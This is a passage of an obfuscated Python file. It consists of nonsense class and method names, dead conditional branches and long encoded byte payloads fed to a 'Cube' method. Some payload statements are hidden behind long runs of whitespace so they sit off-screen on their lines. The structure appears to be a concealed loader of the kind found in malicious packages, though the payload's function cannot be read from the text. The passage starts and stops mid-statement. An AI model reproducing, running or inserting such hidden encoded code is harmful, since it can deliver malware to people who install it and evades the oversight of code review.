;_square.Cube(_statistics='oOoDoDDDDDOODoDOoo',Statistics=b'\x16\x89\x8bq\xa1\x94xN\xa8\xdcT\xb7IP\xed.\x0bWQA\xe1H\x9f*b\x17i(=\r\xfb\\\xf7\xe61\x0f\xd0\xd9\x849jLs\xaa\xf7(\x94wz\xfaY\x8d}ez/\xec}\x129sT\xbaG\xf6Nz0`V(\x82\xcc\xb6\x17nV!\x04/\x93\xce\xea<\xcb\xf8\xf9`\r\xcfGL\x08\xd7\x97\'\x05>5\xb6\x0cdw=\x16\xa2s\x04\xd6\xc4h\x19\xa8\x95\xb6\x9b\x95d\x96\x910\x00M\xca\x87\xb8a5+m\xaa\xeb\x15\xb2\xd3I\x922\xe4\xe9\x97\x97\xfd\xe8\xbb6\x8f\x8c\xe8\x1e\x89c\xa5\x930\x91B\xe9.\x9b\xea6E\xc6\xec\xd2\xc8qj$\xf6\x11\xe6zn\x9b\xe7\xef\xd2\xc6\x800\xda\xac\x1dfO"+E\x93\x93\x0c<\xd2\xf5\xb2J(\xd7\xba\xba\xbe\xa2? (\xa2m\'\xc5\x8e)\xb95\xb1\xa3\xbe6\xec\xa8o\x02\x12\x17cj\n\x17\xdfkoJ]\xe3|\x14\xf7\xa3v&\x88\xfb\xb1k\xf5\xc3\xcer\x12\xdf\x95\xabw\x19\x90\x1a&\xba\xb9n\xe7\x90\x8fJ\x069\xce!G\xcc\xc6\xc2x\xfc\x97\xf6\xf8\xadPD\x07\x16?\xedz\x84\xe0\xa9\xb97x\xe8\x11o\x9f\x06VB]\xc4M\xa2\xc3a\xe8o\xf3%\xb3\x99\xc0\xa6\xac\xe1?\xf38]y:;wK\xc9g*f">U\x9b\xddt?\xf6\xaf\xb1\xce\xb7\xe9\x85\xa7\xb5\xeai_\xc6U\xd7\x0e\xbf\xbbg\xc6\x95]\xa0U\x03kt\x18X\xf5\xb0l\x90\x18t\x1f\xb4\xb1_\x00\x02{\xf9\xf0|\xd0\xdd\xc7\xff\x07\xeb\xa2\xdd\x01\n\xe0\'\x7fu9\xcb\x90\xcbc-V\xf2\xee\rT\x13\xa6\xe7\x04\x12\xce\x90\xb3\x0eL\xcc\xf6\x90\x89:#$\xeaDS\x95)-\xe2Xe:\x18a\x86\x83\x0c3\x1c\x8cG\xd1 `J\xcf\xc1`\x08\xfbHb\xce\x8f\x90`~\x84\x11\xd4\xa0\xbd\xa1\x91k$e\x90\x1f!\xbd7\xe5\xc00\x1e\xc2\xf7q\x9cD\x1exu\x96\x184\xb4a\x83>\xc9\xbb\x073G4\xf2\xe2^\x1b)\xa3\xa63;\xa9\xd9\xa4\x99\xf9\x89\x97<F\x0f\x11\xf5\x01@\x87:[\xf0\\{\xbb\xfb\xa0\xdb[\xda_\x8cP{\xc3\xb7l\x13y\x15\xa3\x07##\x1f"a_>R\\O\xa5t\x0b\x9f`\xcc\xc8\xaa\x04\tU2\xf6\tVJ\xf73y\xea\x044\xc2\x01 \xc6\x0b\xc9gUT\xe8\x87\xd6\xd5\xddB\x07o\xeaG<\x02\x97\x14\xfcA\xd6\t\xe4u\x9d=4ev\xed\xc0B\xa1\xafR\xcc;\x9a\x92F{W7\xd5\xdd\xc2\xbb\xba\xbd\x84\x17t\xc2\xee\xc9\xc9\x1b_\xd9\x12\x84\xb9\xeb\xffm`Y[/\x97I\x8c\xc9\x1e\x13\\\xde\x00T\xec\xc1aUJ\n\xad\x19\x1a\xfd\xb13n\xd5~;\x00\x88u\xc4\x80\xf6\x85\xbaX\x03_l\x1c\x9d\xc4*\x1fQ<\x1c\x86\xc6]\xe3K\xd3\xd8\xb8\x08M\xcf)\xfeQ\x0ca\x84H\xc7Z\xa9\x87\x95\xaa\x87+\x07\xa6\x8e\xc4\xec\x9b\x05\xae,a\xbdt?H1\xb1\xd0\n\xe1\xbe\x18|4\x0bM\xa4\x0cE\x9b\xea\xee\x90\x86ys\xde\x01\x84\xe0$\xdc0\x00Q \xfe\xb4Z\xa9\x87\xdbE\xe0\xb3\x04\xd3\x0b\x11\x95\xa6\x03\x9f\x95J\x1b\x0b*\x02\xc0\xe8\xa1(\xd1\xc3h\x96\xa4^\xbaw\x80\xdan@!1\x93\xc4%:\x13W"\xcaR35\xe9*X\x98\xbf`a\x1ef\x13R_\x98\xadUs\xe3$J\xfc\xcc\x8an^t\xdbn>t\xa1\x16\x1eP#I[%\x7f\xf1y\x81\xff\x9f\xcd\xeb\x15$\x10\xf9\xfc\x19r\x88\\-\x1a{\xedb\xec\x85\x04#\x97\xb0\x80J\xd9\xee}S"\x155\x89\x97\rr\x15;\xb4"\xfa\xdaT\xd7\x1f\xb3\x9d\xf5\xc2\xc8)Dj\xe6\xb3\x8eCEK\xbd\xb9n\xe7\x8b\xb8\n\x96\xc9\x922\x9b}\x99\x98\xb6\xfbH\xae$Dl@/+b\xb0O\xc6\x10\xc3e\xc4/_\xd9\x06\x1c\xe4I\x13gMJ\xdf6N\x18r(\xd9\xc6\xccI\x00\x94\x8fN\x817\x1a"\xf9V\xae\xe5\xb2\x1e\x8b\xf7U\xd8]-\xc0\xbd\xc2\xfe\xba\xae\xae\x1f\x92ZO\xd0\xb8\x91r\xa9\x14\xca\xa1R\xd8\xd7\xeeg\xeb5\x99s\xd8\xaf\xa8\x8ci\x80*\xbb7\xef\x19\x9a\xe7\xd0\x80\x17\xd7\xbd\x8f\xa3xYx\x87\x8f\xc4\xa2\x16\xf6*.\xb7\xd4\x81^c/\xe8\xde\xd6<>\xe4\x88\xb7\x0c\x0cmX\x17\xbc\xb3\x8f\xb5\xce\x02\xbe6d7\xab\xc4I\xea\xe8\xc9v`A\x8cR\xd9"\x8e0b\xde\x1c\x12\xc5\x03\x0e\xff\xa9\x95\xee~\xa7R\xb5\xfc\'j]\x15(a5\x9f\xc7\xa6\xba\xdbh(\r\xa0\x0ed\x85a\x87\xe4\xeb\xcfv\xb3\xb7`\xff%&g\x95\x16\xb6\xae\x9e\xaf\xbc\xf6Q\x1e\xc5\xc8\xa1\x92c\xae\xbc\xc4|\xa2\xccz\x10\xb2m\xcaZ\xc7\xa0\xc1\x89\xe0\t\xcc\xe7rR\xf0\xeaA\xa9\x03\x816#&.|OP\x07\x8f\xeb\xa5>\x14\xcav\xfaz\x1b\xe5n\xa7\xbbn\xeeu\xcb;\x0bB\x0e\x89Z\x10\xb90\xdd"\'q\x8aP\xc1\x98\x81\x82!\xc4\xe2|\x04\xde\xa7Z\xe9~\xda^K\xf3:W\xab\x95\x97\x94\xf2\xd2\xa4\xee\x16\xca\xcbn\xee\xd0(\xce\xe3^\x12\xc6>V"\xe5\x99s\xf0\xe4\xb2\x1f\xa9\xb9\xc7\x88\x9d\\v\xfc\xe3e\xe2f\x17\xd1\x1f\x95\x0c|\xe5\xec\x1d\xa5\xdc\x1dR\xc7O\xd0n\x06\xee~/\x8c\x9b6\x89\x8eJ\xab\xe3R\xec\xa0\xaf\xb1k\xdb\xb4G2 \x8e\xab\x17\xb2\xc9QI\x96\x1fy\xe1\xeah\r\x95^|&C\xcb\xe2\xcal\xa1\xdd\xa5\xb1\xc9%\xc3\xa8z\xe0\x88\xcc9\x1e\x12\xe2\xf8\xf3z\xe9\xa1\x80/\xd8\x8d\xdb\xe6\x844\x02[\x02\x8eS5Mj\x9e\xfa&u\x9b.\x87;\xa8I\x0e\xf0\xe5>\xc5\n$\xd6\xf9\\\x81\xe3y\x18\'f\xfa.\xcck\xe2g\x02W~\xabj\xce1\xcd\xc4\xd5\xfdT(\x97\x17g\xe6\xbd\x83\xd5\xe9\xc8.\x10B\xcb\x8c\x9f}xC\xd1\x02\x9a\xa1\xc7!`\xa6\x83\xb0Zv\xf0\xdeR\x8by\xf6\x12\xf3\xa2r\x18\xdaW\xfd\xa9a\xc4\xcb\xa1\x98\xe8\xe0\xb8x\xe8\xa9\xd8\xe90\xf4\xb6\xb1\x04\xbbM\xf7\x02\xdf_\xcc.\xa5\x00\x19x"t\r\xd5J\xdb\x99\xdfE\x02\x15\xa6R\x9b\x16\x84\xb7{\xca\xfc\xbe\xa9\xaeo\x0e\x84t\x94E\xad\xf9\x82C\xf2\x0e\xd3\xe3\x9a\x9e\xf4\xf5\xbf\x8dz\xf7\x06\xe6)N\x86\xd5\xe7\x07\xa7\x88h\x1c\x1f\xd6\xc5\xd5o+\xb2V\xb3\x9c\t\xdb\x89\xceN\x98V\xd2[\xad\xab\xdb\xc4>\xbe\xae\x05o$\xe5<C\xfap\xbb\x9dz\x9a\xab\xa7\x0e\x19\x92A\x1b+\xf5tS\xdd\x861\xba\x7f\x1d\x12\xc0Q\x95(\xb3\n\x80\xf1\xc6\xd5\xe4i\xa9\xd5!\xa5z\x89U\x0bp\xf7F|o\xc1!\xb1b\x1aIUXH|\xef\xf0\xd7\x12<\xe2A\xec\xf6\x11\xf5b\xc3}F\x8a3N\xf8\xe2\\\x12\x05?\x01?H\x8c\x87\xa1\x03fl\xc5B\x13\xdf>\xf5\t\xcf\xf7\x92\x08\x91W\x81\xfdA=%NM\xa0H\xf2Y`\x9cq%\x18u]\xdd\xa6<\x04\xbb\xccs\xad9s\x17\x84\x83a\xb3B@\xdb\x87\'\xb3t\xaf\xb7l\x87\x13\'pJ\x8e\x9c\x8792I\x11\xf6\xbbV\xba\x05\x96<!Ra\x94\xb8{h\x8fI\xea\xa5\xbb7\x99\xc8\xd5\x1a},~\x1c\xf1\xc0\x0b\x9e\xbbI\xddm\xf1\xdc\xbb\xc4\xc4\xb1W\xd8\xfa\x8a\xb5Y\xc4\x83\x11d\x08\xd1(\xc3\x98\x88X\xb2\x18"S\xc0e\x9e\x95\xa2W\x14YK\x07\x19b.\xbf\xd0\xdb\xe5\x16\xceeR\xdbrd3 \xc6\x83\x181SI\xbd\xb4\x85\\\x9c8\xb7\xa6\x0e\xa9O\x95j\x16Wr\xa7\xad\xab\xebs\xd6\xeb \xc1\x0b\xbb\xff\xc8\x1d\x08G{\xc43\xf0\xa0r\xe7\xa8T\x13\xe6-F\x1a:\x18\xeaE\xbd\xf4\xa0g\xd2]t\xa1\xa0\x1b\xf3\xfd\x91\xc4\xfa\xbf\xaa\xa8\xff\x86^\xf0\xd6\xc2\x80f\xb4L\x12\xe7\x11\x97\xfc,8\x0c\x94\x11yS\xddn\xe2>\xc0N\x18q\xdf\t\xd0=\x191=a\xad\xd4\xc3Z\x9e\xe3\xfest\x8fR\xc2)\xea\xd1\xb5\xd2\xfd\xf7\xd2\x8d\xb1\xa9\xe4\xf1\x9b\xd3\xe0o\x98\xa3~\xbb\xf1\xceXm\xa63\xce\xf0\xbe\x04w\x01\x87\x89qY\xbb\x0e\x99\xa8\xf9\xd7\x9a\xc9\x12\x97\xa3C{56\xd5\xf5n\x05\xf2\x9c\x15\xf5Hq\x07I\xa2\xc4-t\x85\x08\x83!2\x04\x12\x11\xd1+\x85i\xd4J=\x8c#\xca-\x91!\x89v\x8cO\x80\x1e\xa4\xf5\xd2\xc6=\x8f\xce\x9bhNs\x16*\x89p\xb1T\xba?(\x83\x9e\n\xc5\x8f&\xba\x92\x96(\x9a\xd4\xddB\xa2h\rI\x01\xbd6K\xa8\xefzT\xd9\x1d\x8cT2\x1f\x8el\xea\x08\xfc\xd6CXTZ\x98\xe7(M\xa2\x96H\xea#<\x0cO\xa42\xb7\xe2\xec\xda\x18yC\x04]\x19\xfa\xa0sN\xba\x92\xd5K\x1b/K\x01N\xbc9jQ0\xd9\x86\xb8,\xd5J\x1b\xef/c\xad.e\x8e\xde\x08\xf7W+m,\xc4g8\x99\xf4\x98\xef7b\xdfK\xadt?\xc33V\xc3M[\x9f\xc5"\x8dB}\xc5\xcc\xb1\xaa.\xe6\r\xf72<\xb7Q\xd3\xdf\x82\xd8\xa3\x9cm\xbc\x1e\xd7\xe3\xca\xba7\xfc\x02\x85\x07\xccPA[\xc4\xcf\x91\x18\xdc\x84\x82\xafq\x1a\xeeNX\xe4E\x1c\xc9To\x12g\x01Z\x1f*\xf4z\xeb\xeaf>\x8dm\x1d\xe4\xb8^\xed4pqa\xe5\x880/\xcc\xc1\xc9\xb0D\xfd\x1e@\x94\x01\x9a<\x8cDfi:\x02b\xae\x8d#1\x92$m\xd3\xbd_\x00\'\x7f\x9fH\x97\x91{\x19H\x98\xcf/\xce\xdb!\x9a\xc5\xf4 Y\nu\x1awL\xed^\x89GYW\xd7S<J\xd6\x16\xe1\xba\xde\xd9\xe4\xfa\x8f\xee5\xe5~\xd4\n\xb1_`\x0e P,\x05+@kk\xc2\xea\xa6-mo\x80\xaar:\n\xba5U\x9av\x93\xbaM5\xed\r\xf9\x94\xbe\n\x9e\xc3\xbd6L*\xf7\x16\xee\xe7\x8e\x10\x93G\xd7\xd7!\x17\x0b\xa2\xa1)\x90!F\xa5)\xb8\x93h\xf3\xc8Z\xca+\xa5{\x050l\xe8\xdc\x01\xa7\x87\xa0\xd8\xe8\x00\x05\xd1\x005\xc0R\xe9\xfe\x96\xc4\x9e\x9a\xaa4\xac[\x124,\xe3\xc1^Uw\x1b\xbdi7Z3\r\x03\x16`')

        _square(_system = 7366 - -74153)._invert(Builtins = Invert._run * 8901)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='mmnmnnmnmnmnmnnmmmnnnm',Statistics=b'\xb0\xcb\xf3qx\x99"W^\xca\xc8&%)\x98G\xc9\xd1|[n%/NT\xb3@\x04F\xe1\x9b\x80\x89\xc4\x8b\xc2\xe9\x14LG\x10\xea\xfc\xc5\x82z\xf6\x10\xbf\x18\xa1\x93e\x10\x06\xa3\xa8h+? \xfe\xf93\xfeS\xec9\xc4\xa0\xfb@anS\x17U\xcb\xdc\xce!\x11c6k\xa5\x8d\xd5\xe2\x1ef\x1c\xcd\x95\r\'\xab\x96y\xb8\x8e\xad\x08F\xf6\xab\x93\xadyn\xc8\xe9\x1e\xa3f\x9d\xa3\x86\x1d\xb3\x91|I\xe9\xe1\xba^v\xcc\x1a\'\x08\x16\xc1\xbc\xe8\x0cr\xf4\xa9{u\xb4\x0b\xa7\xdc\\lJt8\xdcjj\xa6\xf7\x1c\x83\x0b#=`\x9272\xd7P\xf2\xc2\xb0^\xda\xb0;\x91\x97 U\xc6\x1f`\xaf\xcf\xeb\xa5\x87\xdd\xe5\x8a\x12\xf5\xa0^@\x8b\x92\\\xe0\x85n\xf8\xde<\xbd\x87\x9eiz\xc8*}\xa1\x0bO\xeb\xfe\xf2\x08X5\xa6L\xe1\x9ey/\xea)\x7f\xf0\xfd/K\xeaQ\x89\x10\x98\xa8\x8c\x18\x1a\xca\xe8#7F[\xee\x89#\x8cL\xc0\xff\x07\x8cHxhj\x8cCs9\xce\x1d\x05\xc1\x91p\xc1+\xea\xa5\x8d=T1\xa7\xe9\xa5D\xaf\x19J#i\xbdt\xf7\x19\xaaP\xea\xbb@\xff\xc5 \xe3B\x00\\\xb8\xc0\xba\xba\xdb\xa6\x93\xdc\xcd3\xd4\x05\xad\xa2\x90\x8a\x13\xa8\x01\x19\x16\x0f\x90[1TF2\xa1\x1c\xd2,Ii\xc5\xb8\xb6\xa9nC\xe3\xda\xae\xf7&\xcc \xc3E\xf7<&\xe3R\x94\xd1x\xc9l\xe2\xca=\x80\xa1=\xe4\'\xb4\xa4\x92\xcbS\x81\xb90=\xa9\xd5u\x88\x9ee\x95X\x96*\xc7\xe2hT\xd7\xda\\\xb7\xf3\x10\xe1R\x13e\xb69J\x9f<\x01\xaa\xc1\\\xec-t\xce-\x80\x1a\xcd\xef\x16D\xfb\xb9\x95\xc5\xf8p\xf8\xf8\x8f04\x8b\xcb\xaf9^\xef\xba\xb1A\x13V\xba\x00\xa5q\xa2e\xceY#\xaf\x95\xeeUJ?\x18\xe7\x95\xa2:\xa8P\x04Ux\xe3\xf0\xf5\xaf\x8e\xe1\xed\x9f_\x9c\x83\xc7\n\xb3\x86b\x8a\xe9sSt\xd1\x14m\xd4rPd\xcaQ\xa5\xc1\x85\xb2\x1d(gi\x93\xba\x1e\x9d\xa5\xdd%\x88\xe3\xe3\xc1\xb1\xf1\x1f\x8d\x02\xcd\x80\xbak\x85\x9aD\xad*\xbdd9\x07\xd2\xbaz\xbe8\x90*ys\xba\xd7\xfa\xaa\xba\x9e\xd6\xf7\xfc\xea~\xfe\xf4u\x9b\xca\xb1\x88]\xa2qm\xb7WN\t?z:\x90\x83\x17\xad\xe9\xa6a\xaf\x97\x18\x1c\x80\x1b\xe6\xb9\x05\x98J\x18\x022D\r\xc6\x0c\xa6\xaa\x94\x1e\xae\xa9s\'ti`&\xf6\x02\x13KEY\x91\xb5$\xff[eQ\xd5Y\xca\x9d\x15\xd5\xe5g\x11\x02\xe2V\x02S\xc2\xae\xd1\x0cuk\xf8T\xa0\xe3\xb4V\xba\x85\x1f!f\xb0\x1aI+!{\x12*\xa5\x8d\xad\x95=\xc6/\x87\xe8\xca%x]^/m\x07I+\x94G3R\xfa\xbd\xb8\xf93\x05I\xdbT\xb7a\x12\xc3F\xe8\xf1/<"\xf1d/i\xab\xe9\xe0\x0cQH\xa4\x81\x08\x94\xde\xa9\xa5<\xae\x94\x1e\xb2\x08\xe9\x95\x8d\xa9\xcc\xb6;.\xadGv\x95\xf2\xe3x\x85\x88U\x0f\xe9\x87\xd5\xe9;R\xe1I\xe5\xd5<\xbbw\x8e\xfb\xb8\x98\xf2\x89OJ\x97S\xe2K\xfeK\\\x8e\xb2\xe0\x94\xf3$\xd7\x83\xdd\xbb\x0fo7\xb3\x12\x8d\xa3&\xd4|k\xc1t\xa0\x81 \x90\xee\xe2\xdc<\x10N\xb7\x1f\xbb`\xb7\x00\x9c\xb5\x0c\x0e\x90\xba.j\xab\xb6\xad\xd4[\xabD}\x9a\xc0\xaf\xccy\xee\x83\xb0\xaf\x0b\x95\xfc\x88#\xe38:n\x0b;\xf2\x1e\xa3\xb7%\xf6H\x9e\x89Z\xbb\xc5>\x1c\xab\xd4R\x9b\xean\x19\t\xb2w\xfe\x89#f\xebe\xc2^k\xf1o\xda\xda\x0cL\xc8\x15\x80\xaeW-;\xe8\xd1\x0b\xe9\x92\xf2h`^\xc7\xf0\xea%\xa5_\xd5\xe2\x94\x95F\xab\xdf\xb1\xdbU\xd6$`\x1b\xc7\xffK\xd9\xf9\x976I\xc0=\x13\x8e\x87i\xe4\xa2\xa2Z;9\xfb\x8euU\xa2\xf7\x1a\x8e\x8f\xe2.g\x91\x19PQ\x18\xd8\xf3\x91r\xf5TJ\x0fv5\xdcE\xfc\xa6x\x9cn\xe0\xbd\xc08\x87$\xc9\x98B\x0f\xb8\xe6\x80q\xeePQ\xcd]e\xb4[*\n\xba\x84\x99\x0e\xbb\xe2\xf0+>\xccE\xc90\xa1D\xe4#Ix\x9a\x8c\x93a\x1c\x8e\xa2\xc2\x1c\x10\xca\x92\x04M\xd7q<\t\x03\x88\xd3\xc0OP>\xf6\xd0\x00\xb1\xe5>\xb2\xa4\xa3\xb1\xb3x\xc4\x9c\xc5!v\xb9\x1c\xfc\xa8a\xfe\x82-U\xda\t\xd9\xb2e*9\x05\\j\xd7\xcbD\xa1\x04\x18-\xc8H,\x1d\x86\xb6*p\xc3\xa6\xbaM8X\xb6n\x9e\xd8\xde{\x9b\x8b\\\xee\xb5\xb0\xaf\xa8^\xd0\xda)x\xc0y!\xb7\x1e:n\xd0\xa4%\xc3\xa0k<\x0fQ\x7ff\xa8\xc4i\x9e\xde\xa3\xe53\xce\x8a\x96\xb2*\x05\xb5|\xb5q.\xf8~\xb0\x11.U\xb4|\xea\'\x14@\xd6\x02Gz>\xaaE8\x8c\x9a\'X\xde\xf2\x12\x85\xbe\xb8\xf5\x9d\xe5\x88%\xe4}\xfc\xca\xc1L\xe6\xefM\xd1\xe3+\x9dr\xa9\x9a\xfc\xd2\xc41V\x08SE5E\xe4\xba\xba[\xa6\x88\\\x0f\xfb\xdd_3H\xa6\xac4qQ\xad\x12\xe9\xdaK\x04D\xe5\x14\xe5Mu\xb7\xc9\xfe\xb0C\xbc\x8cc\xb7\xd4\x01\x88:\x08\xdaC\xd8\xb3\xd1-\x01k>I\xcd\xec\x9ae\xa0\xab{%h\x90\xf8\x98\x91\xcd\x180\xf0\x91\x1d K\xc7\xed\xed\\G|<z\xe3\x036\xa5c\xa00\xce\x00\xd9G\x00\'\x9a3\xa3P\xad\xb4\xc5\xd2\xa0\xec89o\x8b\x9b]\xb0\x9dE%\xb2m]\xdd-(\xe9v\xb8\x1f-\xef\x05dg\xf8\x0c/\xf0\x84l\x99W\x9f\xe1\xe5\xaaY\xbc\xd2\x9b,\xadQ\x16\xf7\xb2A\x9c\xc7\x83\xa8g\x1a8\x89\n#\xd8\x84Q\x0e\xc0\x99(\x89\x87Q\x0e\xc6\xd88I\x071\x0cBsC\xd2I\x1cg\xf0\xab<K\xcco"\x18\x90\xe8\xe37\x1f\xcd\xa7\x9e\xa9Q\xa4F\x7f\xcb\n\xb3_\xa3\xe8@i\x0c722rL\x9e\xf6\xa2^<1\xbf\x1f\x98\x1aA\x92\xa4\x899V\x9e\x19\x19\xc7\x1c\'H\x06\x90\xf2)\xb9\x8f\xa3,\x87\xdfE!zY\xc7\x90\n*\rq\xaff\n0u iT\x18\x85Ya\xce\x00\xf6:N\xd3\x0c~\x1b%\xa6J\x9a\x99\xf3\x8d\xe2\x1c!\x15\xbd\x18\xa0\xf492\xc0\x86\xe6\xb7\x19\x9cK:2G12\x15A\xfa\xd2\x02~i\xf6c\xb6\xe0J\xb3,1O3\xf0\xcd\xcc\x9a\xf5\xd2\xd4\xb4\x82i\x81\xc8(\xa3\x90\xa6\n\xbe7?\x84k\xcbch1\xb8\x06\xd32Y/\x06\xae\x95\x81\xa9mZ\xca\x94\xde\xa7#\xb3\xa7\x04\xce\xc7l\x0f\xcc\xb5\x8e\xa0\xe5\xc21\x95\x02\xa6\xd0\xb4jj~i\xf6b\xae$4m\x13$F\xf0\xcf\x12\xde\x93i\xdbx\x94\x15\x98\xb3!\x89\xc2xH\xe7k\xc4M3\x07\xa6\xf0\xad\xd9Wj\xce""\xf7h\x92\xc2\x13\xee\x86\xb9:\xa3>\x0f\xa1m\xb8\xad\xcd\xbb\x17U\xda\x89E\x03\x15\x10"\x9fY\x98\xea~E`\nZ#\x13\xde\xb3\x16\tq\x13!\x90<\x9b\xee\x17\x85\xf7\x11PA\xa7Q\xdb!m\xf9\xdd\x11Ax\xcd\xdb\xbb\x8fg\xc1\xb2\x0b\xe1\xb7\xd0\xab\x08\xdcHsy5\xa9\xdb~^8$\xba\x95#^\xc8\xe6n=k\x0c} \xfa\xac\xde\x9d\xb0\xf5d\x08}\xa8\x95\xeeG\x15\xad\x92[ej\x19\x13!6_A\x84\xb5\xac\xee\x16\xb0\xbd]\r\x8d\x89z\n\x9a_\x00p\xe9\x8a\xd3]]\xb7\x9d\xb1\x92t\x96\x1b~\xc0F;\tDb\xe4\x8b\xca\xb9\xc7\x15\xe9c]\xbd\x86\x92\xc7\xf6\xca\xad\x99\xcf\x13\x0fs\xb3\x02\xf9\xd7\xb2\xefT\xe1\xfeo\t\xfb\x16TO\x95\x8c8O\x1c\xb5f^A\x00\xad\xab\xdbt\xa8\xec`4Sf\xb3\xd8\x99L\xcb\xf9\x9b\xba\xd7\x12b\xb3\x90\x99g\x07z\xc2\xfc\x91\x83k\xe7M\'\xd6\xb71\xfdwb\x18>:\x07\x90\xc4\xc5E\x9f\xd1\xdb\xc4>\xd4\x8cw\xa8u\xa7\x96\xe5Z\'\xc4\xb0\x1a\xbaL0\xca\n\xbc\xa9\xae\xbf\x84\xf4{@\x1f\x0fJ\x1c\x14\xc2I![\x83\xd4\x99\x0e<\xb0Q\xf8\x90zu\x9c\xa9\x0e\xac\x19\x97\x02j\xdc\xb7\xdd\xc7\x9bB\xcaG\xf3\x17dQ4\x08\xefA\xf6\r\')Bb\xd3\xc4H\xc1\x88M6%(#\x9b\xef\xdb\xb9m\x89\x01\x89\xb3\\\x91\xad\xb8\xa9\xb9\x18\xe2S\x13dT\xa5\x08wICX\xd4K\x0f\x1b\xddPcK\xbb\xc7\x0c\xeb\x13\xf1\xe7\x99\xdb\xd0\xd27\xaeR\xcdQ\xd2\xa3-8\xf9\xde\x02\x1a\x90\x01\x04\x1b\x1c\x12\xa6\xd7\x85\x98h\xc7Gr\x9dI\x05{X\x8bY\xf0\x13\x8e\x17gE\xdb\x08\xf5#[\xcalZ\xfcmc\x00q\x0f\x11\xd6\xc45\xd1c\xa6\x88\xa8^z\xd0\xe3&K\x82\xb8gf*\x0fn|\xbb|\x94\x17\x10I\xe9:\xe2\xa5\xc5|\xee^$\xcb\xcc"\r\xc6\x8d0\xcd\xe2\x81\x99\x08F\xb0r\x1a\xe9o\x92\xa5f:\x98\x80}\x0cj\xc0\xe7,\x01\x991\xc2h\xb4l\x90\xf5\xe2I\xd4K{Q\x1e\xc7i\x0cK{\xdcK\x8b$LzI\x86\x96\x0b0\x9c\xf4\xe2\xdc(\x05Qb\xeeO\xd2\x8bR\xd3\xcf\x07Y\x00F\x1es\xbc$\xcec\x80I\x02\xb96\x98\xcf\xc0\x94TdI\x1cEY\x04D\xdb\xa6\xb1\x93^\x86\xb5"\xd3\x8b\xcd\xbe\x93x\x94\x0c\xa2(\x1c\xc7\xc34\x8eC0\xad\x99{\x0e\xe6\xa9<\x1e\x9a\xdf\x0c\xb3\xc0\x88\x19yV$h\xd4\x03\x07#\x18\x05\xc1,h\xa65s\x9a\xe6\x9c\xf1\x82\xd0L8\x84\x92\x14\x0ctI:\x06\xf3\x98Q\x1fz`\x9e3kQan3\x18\xe2\xc0\xc8\x97\xa7\xe0\xb6\x0c\xe0\x9c\xc0\xfc\x07\xc6*s\xf5\xe6(`\x04\x8cB\xb3\x17\xb3N\xa1i.\x8b\x87Y\x01\xf5305\x9a\x89\xd5\xec\x03\x8cf`\x884\x02\xbd)\xea\x19\x890\xcf\xc8ZgN\x15\x8c\\\xe6\xfc\x0b0\xba\x993\xcc\xf1\xd7#48\x82\x99\xaf\x00s`\x14d`$,\xccY\x05`\x844sT\x8f\x8d}9\x1a\xdbz`t4\xd7\xdc3\x93V\x0f\x0c\x8b)\x18\xf4\x8242\xedo\xde\xb3\x01\x98\x1e\xcdb\x1a\x81A4\xea\xc15\x9b\xcfa\x12\x82\xf1\xd2|g\xf6n\xbe\x83;\x00\xd4:\xe0\x9a5]\x00\xf6\x19')

        if 493635 > 3941486:
            Invert._cube(While = 26569 + Invert._run)
        elif 367524 < 6432465:
            _square(_system = 35819 + -86511)._cube(While = -45399 + Invert._run)                                                                                                                                                                                                                                                          ;_square.Cube(_statistics='NNMMMNNMMMMMNMMNMNN',Statistics=b'\xe1\xd1\xd3\xd0\\E\x86\x99\xecc0\x93\x82\xf1\x13~\x1fE\xf8\xad\xe9\x98\xe6\x93\x91\xea\xe0\xdd\\ma\xea\xc2q\xa0k\x81i\x0f\xae0\xc2\xbd\xf5\xcc\xfd1\xbf7"1\x1a\x0e\xbdHg\x03\x9bI\xca\x0e\x19\xe5\x0b\xf1CJ\xddM\n\xb3#\xa2\x06\xfb|\xc5\xc9\x91\x81!\xac!;\x98g\xcd\x06h\xe6s\xce\xed\x932[&8W\xe2z\xe9~4\x92\x8e\xc1\x11G\xb8o\xb3w:\x14n\xb4S\x97\xc4\xd2)\xc1\x97\xda\xb6\x84a\xffJ]\xdaT\xb7a\x14\xd0\xc1$\x84m\x10\xb49^\xf2\xaeI|<\xb0P\xc0#\x8e\xcc$\x0cn\x1e\xf3\x9a"\xf9Q\x06.\x1a3{\xb5\x04\xa1\xac\x98\x8bd\x11w9\xda5=~\x83\xa5|6x\x1c\x8e\x07\xef\t!\xcf\x89c\xf0\x95s\xc9\x9c\xdaS\xc1\xb3\x91\xdc\xadxR\x1b,\xd3lBQ\x8dw\xb0\xc2yg\xb1\xd8+-\x8b\xfaQ\xb5-\x1eh\xdc\xc4\xf9\x05\xc4\xf2\x9f\xf7\xcf\xcf\xc1$t\x8e\x81\xfd\xe6\xa5)\x069&\xea\x7ft&$\xc8\xaeD4\xb7\xb5\xd2\xfdFX\x88\xe9HGC\xf6\xc4\x8cT\x89\xb0XW\xd7{V\x18\xab3\x9b-#\xe9\x85\xe6\xdd\xf4\x15\x0f\x06\'\xc5NQf\xa6\xc8*\xdf\xf0\'_\x91\x02m!\xdb}\xee\xb0\xc8=Aq_\r\xc3\xbd\x96\x9e\x96\x18\xc9\xc5\xde(\xce\rA\x14!\xc8Je\x07\xdcT\xd7\x17o\xba\x0ft\x0f\x11\xf8i\n?\xf7\xc9}G[\x9dO^\xa8\xd8\xf9\xa1\xf8\x1d9\xec\x95KF\xe1\xd0X\x8d\x97\xcb\x9f\xaf6\x9aL\x82\xcbN]\xb0\x06\xbf\xf4\xd7\xae\x90+a\x95\x8e(\xd2\x11E;\xc0\xbd"\x92\xec^\xc9\xa8YI\x15B`\x8d\xbd\x14)\x06\xee\xcd\xf7\xd0\x8c\x89\x99\xa8\x8c\x86\x97\x05\xde\xac[e\xfb\xd6\xa4&\xea\xf9\xe2\xe6\xf0\x02\xbd\x1f\x94\xb2\x1a9\xe5r\xa0H\xa8\xc5V\xe3%I\x8aW\xd1G\x87M\xc4%$\xb8D\x198\x00\xbd7\x9d9\x05\xe3\x08\x98^}\x04\xc7\x94\x99\xefJI\xbf\xbd\xb0\xdd\x19=\xa2\xa3\xfc\x05V\x98\'\xb4Nx\xdd\x18\xa9\xf3\x17\x88\x8e\xeeL\xa8\xa0\xed\x90\x15Xx\xec~\xd9B.\x15(\xe9@>\x8b\x98\x99*r\xaaMu\x0fU\xa28\xb2z\xfc\x8dS\xec\xe1\xe3!X\x9aV\xfa\xd0\x834C\n\xb48\x05\xb3,\x18\xa3a\xb137\x02g\x8e1\xe5m\xcf\x12r\xfb\xb6\xce\xc9\x88\x